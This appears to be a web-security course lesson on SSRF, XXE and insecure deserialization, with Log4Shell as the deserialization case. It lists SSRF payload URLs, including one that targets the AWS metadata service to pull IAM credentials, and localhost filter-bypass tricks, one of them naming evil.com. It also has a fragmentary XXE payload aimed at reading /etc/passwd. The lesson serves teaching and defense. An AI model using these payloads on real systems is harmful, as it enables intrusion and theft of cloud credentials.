Server-Side Attacks & Advanced Techniques

60 min

Server-Side Request Forgery (SSRF)

SSRF allows attackers to make the server send requests to internal systems or external URLs. Critically dangerous in cloud environments where internal metadata services are accessible.

SSRF ATTACK EXAMPLES
══════════════════════════════════════════════
# Basic SSRF - access internal services
https://target.com/fetch?url=http://192.168.1.1/admin

# Cloud metadata theft (AWS)
https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Filter bypass techniques
http://0.0.0.0/admin          # Null IP
http://127.1/admin            # Short form of localhost
http://2130706433/admin       # Decimal representation of 127.0.0.1
dns://evil.com@127.0.0.1:80  # Credential bypass
══════════════════════════════════════════════

XML External Entity (XXE)

XXE attacks exploit vulnerable XML parsers that process external entity declarations, allowing file disclosure and SSRF.

XXE PAYLOAD
──────────────────────────────────────────────


]>
&xxe;
→ Returns contents of /etc/passwd

Insecure Deserialization

Applications that deserialize untrusted data without validation are vulnerable to Remote Code Execution (RCE). This is how Apache Log4Shell (CVE-2021-44228) worked — JNDI lookup via LDAP leading to RCE.

⚡ Log4Shell Impact

CVE-2021-44228 (CVSS 10.0) — One of the most critical vulnerabilities in history. A single log statement with user-controlled input in Apache Log4j triggered JNDI LDAP lookup to attacker-controlled server, resulting in arbitrary code execution. Affected millions of servers globally.